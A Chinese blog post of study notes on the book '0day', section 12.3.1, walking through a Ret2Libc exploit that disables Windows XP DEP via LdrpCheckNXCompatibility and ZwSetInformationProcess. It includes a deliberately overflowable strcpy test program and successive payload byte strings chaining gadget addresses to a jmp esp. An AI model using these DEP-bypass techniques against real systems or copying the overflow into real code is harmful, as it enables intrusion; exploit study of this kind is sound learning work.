0day 第12章--12.3.1节:Ret2Libc 实战之利用ZwSetInformationProcess

最新推荐文章于 2022-11-05 22:01:06 发布
最新推荐文章于 2022-11-05 22:01:06 发布
阅读量769 收藏
点赞数 2
分类专栏: 0day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15727809/article/details/87855384
版权

12.3.1 利用Ret2Libc挑战DEP
思想:通过跳转到 ZwSetInformationProcess 函数将DEP关闭后再转入shellcode 执行。

核心:利用LdrpCheckNXCompatibility函数检查SafeDisc来关闭DEP的流程。
在这里插入图片描述
核心是0x7C93CD24行代码,检查al是否等于1,如果等于1则执行关闭DEP的流程。

思路:由于DEP开启,堆栈不能直接写入,因此我们只需要在程序中找到mov al,1这条指令,然后跳转到0x7C93CD24即可。
第一阶段:
1、使用OD插件OllyFindddr DEP->Disable DEP <= XP SP3查找命令:
在这里插入图片描述
2、仍按上述操作通过step2找到mov al,1指令:
在这里插入图片描述
为避免地址截断,我们选择0x7C80C190
3、写好程序,用OD调试,观察:
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
#include<string.h>

char shellcode[] = {"\x90\x90\x90\x90\x90\x90\x90\x90"
“\x90\xc1\x80\x7c”
“\x24\xcd\x93\x7c”};

int test()
{
printf(“ok”);
char arry[4] = {0};
strcpy(arry,shellcode);
return 0;
}

int main()
{
HMODULE hMod = LoadLibrary(“shell32.dll”);
test();
return 0;
}
4、搜索字符串,在‘ok’处下断点,单步运行,程序正常跳转到0x7C80C190处
在这里插入图片描述
5、单步继续,来到LdrpCheckNXCompatibility函数里面
在这里插入图片描述
在这里插入图片描述
6、但程序没执行几步,就发生了异常。
在这里插入图片描述
这是因为执行到0x7c95f70e处mov dword ptr ss:[ebp-0x4],esi 时,ebp为0x90909090,因为写入异常。

要解决这个异常需要调整ebp的值
第二阶段:
问题:如何使ebp指向一个能够写入的位置呢?这个位置怎么找呢?
答案:通过Push esp POP ebp retn指令将EBP定位到一个可写的位置(和ESP相同的位置)
1、使用OllyFindAddr插件,在Disable DEP <= XP SP3搜索结果的setp3查看符合条件的指令,这里我们选第二个0x5D1D8B85(RET 4指返回之后ESP-8)
在这里插入图片描述
2、于是修改代码:
char shellcode[] = {"\x90\x90\x90\x90\x90\x90\x90\x90"
“\x90\xc1\x80\x7c”
“\x85\x8b\x1d\x5d”
“\x24\xcd\x93\x7c”};
OD载入运行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3、接着跳转到LdrpCheckNXCompatibility函数里面,0x7C95F70E没有报错
在这里插入图片描述
4、继续单步,执行ZwSetInformationAddress函数
在这里插入图片描述
5、继续单步,发现返回地址变成了0x4!这是怎么回事?
在这里插入图片描述
观察,执行ZwSetInformationAddress函数之前
在这里插入图片描述
之后
在这里插入图片描述
这说明因为执行这个函数,导致了shellcode被覆盖。Shellcode覆盖不要紧,大不了不执行嘛,但是LdrpCheckNXCompatibility的返回地址也被覆盖了!这就导致出错!
提问2:为什么会被覆盖呢?
因为shellcode距离ESP太近了,导致栈操作时,shellcode被覆盖!因此,增大栈空间!抬高ESP的值。

第三阶段:
如何抬高ESP的值?
通过RET + N操作(retn之后,ESP+N)
1、通过OllyFindAddr插件中的Overflow return address -> POP RETN+N选项查找相关指令
作者建议Number of pop =1 Number of ret = 0x28
在这里插入图片描述
在搜索过程中,选取指令要求不能对ESP和EBP操作,否则将失去对程序的控制权。这里我们选择0x7C974A19
“\x90\xc1\x80\x7c”
“\x85\x8b\x1d\x5d”
“\x19\x4a\x97\x7c”
“\x24\xcd\x93\x7c”};
2、OD载入,此时ESP=0x0012FF34
在这里插入图片描述
单步,发现ESP变成了0x0012FF3C,相差了8个字节!why?
在这里插入图片描述
这是因为执行retn ESP-4 , 但指令是retn 0x4,因此ESP-8,因此执行完retn 0x28之后的返回地址在0x0012FF3C处!
单步,果然!
在这里插入图片描述
因此在调整ESP大小时要留出4B的大小,
3、更改shellcode
char shellcode[] = {"\x90\x90\x90\x90\x90\x90\x90\x90"
“\x90\xc1\x80\x7c”
“\x85\x8b\x1d\x5d”
“\x19\x4a\x97\x7c”
“\x41\x41\x41\x41”
“\x24\xcd\x93\x7c”};
OD载入
在这里插入图片描述
单步,果然成功了!
在这里插入图片描述
4、观察调用ZwSetInformationAddress函数前后,shellcode有没有被覆盖
调用之前:
在这里插入图片描述
调用之后:
在这里插入图片描述
没有被覆盖!
单步继续,执行完LdrpCheckNXCompatibility后,程序返回到0x41414141了!
在这里插入图片描述
为什么返回到0x41414141了?也就是为什么ESP会是0x0012FF38而不是0x0012FF3C呢?
因为leave指令= mov esp,ebp pop ebp
当执行leave之前
在这里插入图片描述
所以执行leave之后,esp= 0x0012FF34,然后esp+4 = 0x0012FF38
在执行retn 0x4后,esp+8=0x0012FF40

第四阶段:
一般,这个空档用进程空间中的jmp esp指令地址填充,使得关闭DEP后,shellcode进入堆栈继续执行
1、 使用OllyFindAddr找到jmp esp指令地址0x7DC5C1B4,修改shellcode
在这里插入图片描述
2、char shellcode[] = {"\x90\x90\x90\x90\x90\x90\x90\x90"
“\x90\xc1\x80\x7c”
“\x85\x8b\x1d\x5d”
“\x19\x4a\x97\x7c”
“\xb4\xc1\xc5\x7d”
“\x24\xcd\x93\x7c”
“\x90\x90\x90\x90”};
OD载入,运行到关闭DEP之前
在这里插入图片描述
单步,来到jmp esp处
在这里插入图片描述
单步,成功!
在这里插入图片描述

Angelki
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1225
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
shellcode弹出对话框
Linux方程式
11-11 3082
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
Ret2Libc 实战利用 ZwSetInformationProcess
weixin_30237281的博客
03-11 396
参考 《0day安全软件漏洞分析技术第二版》第12 攻击未开启DEP的程序 思路: 微软要考虑兼容性的问题,所以不能对所有进程强制开启 DEP(64 位下的 AlwaysOn 除外)。 DEP 保护对象是进程级的,当某个进程的加载模块中只要 有一个模块不支持 DEP,这个进程就不能贸然开启 DEP,否则可能会发生异常。 这种攻击手段不与 DEP 有着正面冲突,只是一种普通的溢出攻击。 利用 R...
<Oday安全 12.3.1Ret2Libc实战利用ZwSetInformationProcess>一补充
lixiangminghate的专栏
03-08 908
本文补充记录我在试验关闭DEP过程遇到的问题和解决方法。     首先要说一下用OllyFindAddr插件寻找目标指令时可能会遇到的问题。诚然这个插件是个好东西,能迅速列出需要的指令流的地址,但并不是所有在列的指令地址都可以使用,挑选前需要甄别。以关闭DEP保护流程中抬高esp值"Find Pop Retn+n"为例: 插件罗列了一堆备选指令地址,我挑选最后一个地址"0x7D97FE
<Oday安全 12.3.1Ret2Libc实战利用ZwSetInformationProcess>一注记(下)
lixiangminghate的专栏
03-01 1186
在前一篇一注记(上) 的末尾部分,我们遇到访问无效内存的异常,本篇将讨论如何解决这个异常并关闭DEP保护。我们已经知道引起异常的原因是向无效地址[ebp-4](0x9090908C)写入数据。要解决这个异常可能有2种思路:1.让[ebp-4]指向可读写的地址;2.修改函数LdrpCheckNxCompatibility的实现,当然,这种方法不是本篇讨论的内容,是否具有可行性也没有验证过,所以,还
HP288pro-G8-i7-11700-OpenCore-0.8-EFI-Monterey-12.3.1.zip
05-24
HP-288-Pro-G8-i7-11700-OpenCore-0.8-EFI-Monterey-12.3.1.zip。核显UHD750目前没有驱动,但能显示,安装后,外加一张A卡就行了,声卡OK,网卡OK。。。。
[12.3.1]--711图的应用:强连通分支.srt
04-03
[12.3.1]--711图的应用:强连通分支.srt
[12.3.1]--711图的应用:强连通分支.mp4
04-03
[12.3.1]--711图的应用:强连通分支.mp4
python2-tripleoclient-heat-installer-12.3.1-1.el7.noarch.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
python2-tripleoclient-12.3.1-1.el7.noarch.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Ret2Libc 实战利用 ZwSetInformationProcess.zip
06-11
使用ntdll库中原有的ZwSetInformationProcess代码关闭DEP。
使用 NtSetInformationProcess hook syscall
05-30
使用 NtSetInformationProcess hook syscall 文件是使用例子
OD插件-OllyFindAddr
09-11
0day2中讲的,用来搜寻特定指令用的插件
内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数
weixin_30911451的博客
05-11 468
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,数据执行保护DEP就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时...
9.2 Ret2Libc实战利用ZwSetInformationProcess
qq_55202378的博客
11-05 1229
DEP ZwSetInformationProcess
Ret2Libc学习NtSetInformationProcess DEP
weixin_30292745的博客
09-15 277
DEP简要说明 链接········································· DEP设置标示在KPROCESS 结构中 XP 下 nt!_KPROCESS +0x000 Header : _DISPATCHER_HEADER +0x010 ProfileListHead : _LIST_ENTRY +0x...
ZwSetInformationThread(反调试)
lwhaaaa的博客
04-26 1636
目录0x01 ZwSetInformationThread () 介绍 0x01 ZwSetInformationThread () 介绍 ​ ZwSetInformationThread 等同于 NtSetInformationThread,通过为线程设置 ThreadHideFromDebugger,可以禁止线程产生调试事件。函数原型如下: VOID DisableDebugEvent(VOID) { HINSTANCE hModule; ZW_SET_INFORMATION_TH
0day12--12.3.3 Ret2Libc实战利用VirtualAlloc
I have a dream
04-08 432
实验环境: Winxp sp3 VS2010 实验配置: 禁用优化、关闭GS、关闭safeseh、开启DEP 思路:当程序需要一段可执行内存时,可以通过kernel32.dll的VirtualAlloc申请一段具有可执行属性的内存。因此可通过利用此函数将shellcode复制到申请的内存空间中,以绕过DEP。 如何利用? 将返回地址覆盖为VirtualAlloc的地址,参数输入进去即可。 ...
NtSetInformationProcess设置硬盘ProcessIoPriority
weixin_30698527的博客
07-31 622
机械硬盘是目前大多机器的瓶颈。固态硬盘价格依然较贵,而且寿命太短,不适合长期高负荷写入。机械硬盘的问题在于,默认是按照最大速度写入,当连续写入错误达到一定值时,会造成降速,磁盘模式由UDMA6降低为UDMA2或PIO,windows操作系统不能有效的识别何时应该降速运转,以避免错误达到减速模式阈值,在变成降速模式后又很难恢复成UDMA6。另一问题是,当机械硬盘按默认最大速度写入时,会造成...
typeerror this.getOptions is not a function sass-loader node 12.3.1
最新发布
08-17
在 Node.js 12.3.1 中,`this.getOptions` 方法可能无法正常工作。 为了解决这个问题,你可以尝试以下几个方法: 1. 升级 `sass-loader` 版本:确保你使用的 `sass-loader` 版本与 Node.js 12.3.1 兼容。你可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值